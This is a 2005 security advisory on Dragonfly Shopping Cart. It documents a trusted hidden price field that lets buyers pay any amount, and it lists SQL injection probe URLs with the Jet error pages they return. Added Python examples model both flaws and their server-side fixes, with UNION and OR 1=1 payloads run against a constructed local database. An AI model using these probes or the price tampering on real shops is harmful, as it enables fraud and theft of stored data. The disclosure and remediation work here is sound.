Dcrab's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc., or even code them. Learn more at http://www.dbtech.org

Severity: High
Title: Dragonfly Shopping Cart Multiple Vulnerabilities
Date: 11/07/2005

Vendor: DragonFly Shopping Cart
Vendor Website: http://www.incredibleinteractive.com/Active/dc_Productsview.asp?key=5
Summary: Dragonfly Shopping Cart carries the product price in a hidden form field that the server trusts, so the buyer can change the price paid, and several pages pass request parameters straight into Jet SQL queries, giving SQL injection.

Proof of Concept Exploits:

Hidden Price Value Vulnerability (HPVV)
The product price is sent to the cart in a hidden form field, x_DragonflyCartProductPrice, and the submitted value is used as the price. Editing the field before the form is submitted changes what the cart charges, so the biggest and most expensive products can be bought for any price the attacker chooses, including nothing. The following pages carry the field:
/demo/dc_Categorieslist.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="15.49" size="4">


/demo/dc_Categoriesview.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">


/demo/dc_productslist.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">


/demo/dc_productslist_Clearance.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">

The forms also carry other hidden fields, the client's IP address among them, which can be rewritten to make the order look "technically" more anonymous, though any normal logging system would still catch you.
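Added example (this is not Dragonfly Shopping Cart's code, nor the advisory author's): a small Python model of the flaw above and of the server-side fix. The field name x_DragonflyCartProductPrice is taken from the form snippets above; the catalog, the form HTML, the product keys and prices, the other field names and the checkout functions are assumptions constructed for the example. It shows a quick audit check that flags hidden inputs carrying price or address data, a checkout that charges whatever price was posted (the behaviour the advisory describes), and a checkout that charges only the catalog price and reports any mismatch as tampering.

```python
"""Added example; not code from Dragonfly Shopping Cart or the advisory's
author. It models the hidden-price flaw and the server-side fix. The field
name x_DragonflyCartProductPrice is the advisory's; the catalog, the form
HTML, the other field names and the checkout functions are constructed."""
from decimal import Decimal
from html.parser import HTMLParser

# Constructed server-side catalog (product key -> price). In the fixed
# checkout this is the only source a price may come from.
CATALOG = {"5": Decimal("15.49"), "7": Decimal("899.00")}

# Constructed copy of an add-to-cart form in the style the advisory shows,
# with the price and the client address carried in hidden inputs.
FORM_HTML = """
<form method="post" action="/demo/dc_cart.asp">
<input type="hidden" name="x_DragonflyCartProductKey" value="7" size="4">
<input type="hidden" name="x_DragonflyCartProductPrice" value="899.00" size="4">
<input type="hidden" name="x_ClientIP" value="10.0.0.5">
<input type="submit" value="Add to cart">
</form>
"""

# Constructed POST body after the attacker edits the price field to 0.
TAMPERED_POST = {"x_DragonflyCartProductKey": "7",
                 "x_DragonflyCartProductPrice": "0", "qty": "1"}


class HiddenInputs(HTMLParser):
    """Collects name -> value for every <input type="hidden">."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.fields[a.get("name") or ""] = a.get("value") or ""


def suspicious_hidden_fields(html):
    """Audit check: hidden fields that carry state the client must never
    dictate (prices, totals, the client's own IP address)."""
    parser = HiddenInputs()
    parser.feed(html)
    flagged = []
    for name in parser.fields:
        lname = name.lower()
        if "price" in lname or "total" in lname or lname.endswith("ip"):
            flagged.append(name)
    return sorted(flagged)


def checkout_vulnerable(posted):
    """The behaviour the advisory describes: whatever price was posted is
    the price that gets charged."""
    qty = int(posted.get("qty", "1"))
    return Decimal(posted["x_DragonflyCartProductPrice"]) * qty


def checkout_fixed(posted):
    """Price is looked up server-side by product key. The posted price is
    never used for the charge; a mismatch is reported as tampering so it
    can be logged or the order refused.

    Returns (total, tampered)."""
    key = posted["x_DragonflyCartProductKey"]
    if key not in CATALOG:
        raise ValueError("unknown product key")
    qty = int(posted.get("qty", "1"))
    if qty < 1:
        raise ValueError("quantity must be positive")
    price = CATALOG[key]
    try:
        tampered = Decimal(posted.get("x_DragonflyCartProductPrice", price)) != price
    except ArithmeticError:  # non-numeric garbage in the field
        tampered = True
    return price * qty, tampered


if __name__ == "__main__":
    print("hidden fields to review:", suspicious_hidden_fields(FORM_HTML))
    print("vulnerable cart charges:", checkout_vulnerable(TAMPERED_POST))
    total, tampered = checkout_fixed(TAMPERED_POST)
    print("fixed cart charges:", total, "tampered:", tampered)
```

Run directly, the tampered POST is charged 0 by the vulnerable path and 899.00 by the fixed one. The point generalises beyond price: any hidden field that encodes a server-side decision (price, discount, quantity limit, the client's IP) has to be re-derived or verified on the server, and a mismatch is a useful detection signal, not merely an input to reject.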
 
 
 
SQL Injections

Each request below produces a verbose Jet or VBScript error page that echoes the failing query expression; the echoed text confirms the injection point and also leaks column names and the shape of the query.

/demo/dc_Categoriesview.asp??key='&RecPerPage=5

Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_Categoriesview.asp, line 1054


/demo/dc_Categoriesview.asp?key=%26dir%26

Microsoft JET Database Engine error '80040e14'
Syntax error (missing operator) in query expression '[CategoryKey] = &dir&'.
/demo/dc_Categoriesview.asp, line 1054

(The key value is concatenated into the WHERE clause unquoted, so no quote character is needed to break out of the expression.)


/demo/dc_productslist_Clearance.asp

Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'.
/demo/dc_productslist_Clearance.asp, line 292


/demo/dc_productslist_Clearance.asp?cmd=%27

Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'.
/demo/dc_productslist_Clearance.asp, line 292


/demo/ratings.asp??PID='

Microsoft JET Database Engine error '80040e14'
Syntax error (missing operator) in query expression '[ProductKey]=''.
/demo/ratings.asp, line 68


/demo/dc_Productsview.asp

Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_Productsview.asp, line 931


/demo/dc_forum_Postslist.asp?start='

Microsoft VBScript runtime error '800a000d'
Type mismatch: 'nTotalRecs'
/demo/dc_forum_Postslist.asp, line 319

(This one is a VBScript type mismatch in the page's own paging code rather than a Jet error; it shows the start parameter is used unvalidated, but on its own it does not prove a database injection point.)


/demo/dc_forum_Postslist.asp?key_m='

Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_forum_Postslist.asp, line 200


/demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype='

Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_forum_Postslist.asp, line 200


/demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1

Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_forum_Postslist.asp, line 200
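Added example (not the product's or the advisory author's code): the query shape that the second dc_Categoriesview.asp error discloses, rebuilt on SQLite so it runs offline, beside the parameterised form. The CategoryKey column name comes from the advisory's error text; the Categories and Users tables, their rows, the Password column and the exact SQL are constructed assumptions. Jet's dialect differs from SQLite's in places, but the concatenation pattern, the errors a stray quote or operator produces, and the fix are the same.

```python
"""Added example; not code from Dragonfly Shopping Cart or the advisory's
author. It reproduces on SQLite the query shape the Jet error page reveals
('[CategoryKey] = &dir&': the request parameter concatenated unquoted into
the WHERE clause) beside the parameterised version. Tables, rows and the
Users/Password schema are constructed; only CategoryKey is the advisory's."""
import sqlite3


def make_db():
    """Constructed stand-in for the shop's Access database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Categories (CategoryKey INTEGER, CategoryName TEXT);
        INSERT INTO Categories VALUES (5, 'Widgets'), (6, 'Gadgets');
        CREATE TABLE Users (UserName TEXT, Password TEXT);
        INSERT INTO Users VALUES ('admin', 'hunter2');
    """)
    return db


def categories_view_vulnerable(db, key):
    """The pattern the advisory's error page shows: the raw value of the
    'key' query-string parameter is glued onto the SQL text."""
    sql = "SELECT CategoryName FROM Categories WHERE [CategoryKey] = " + key
    return [row[0] for row in db.execute(sql)]


def categories_view_fixed(db, key):
    """Validate the type the column expects, then bind it as a parameter
    so the value can never be parsed as SQL."""
    try:
        key_int = int(key)
    except ValueError:
        # Answer with a 400 in a real handler, never with a database error page.
        raise ValueError("key must be an integer") from None
    sql = "SELECT CategoryName FROM Categories WHERE CategoryKey = ?"
    return [row[0] for row in db.execute(sql, (key_int,))]


def probe(view, db, key):
    """Send one value at a view the way the advisory probes them, returning
    either the rows or the error text instead of crashing."""
    try:
        return ("ok", view(db, key))
    except (sqlite3.OperationalError, ValueError) as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    # "'" and "&dir&" reproduce the advisory's syntax errors; the last two
    # show what the same hole yields once the attacker stops probing.
    for key in ["5", "'", "&dir&", "5 OR 1=1",
                "0 UNION SELECT Password FROM Users"]:
        print(repr(key), "->", probe(categories_view_vulnerable, db, key),
              "| fixed:", probe(categories_view_fixed, db, key))
```

In classic ASP the parameterised version is an ADODB.Command with Parameters rather than string building. Independently of the fix, the detailed Jet error pages shown above should not reach the client: they hand an attacker the column names and query structure that the UNION case relies on.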
 

Author:
These vulnerabilities have been found and released by Diabolic Crab. Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com; please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Look out for my soon-to-be-released book on secure coding with PHP.



Sincerely,
Diabolic Crab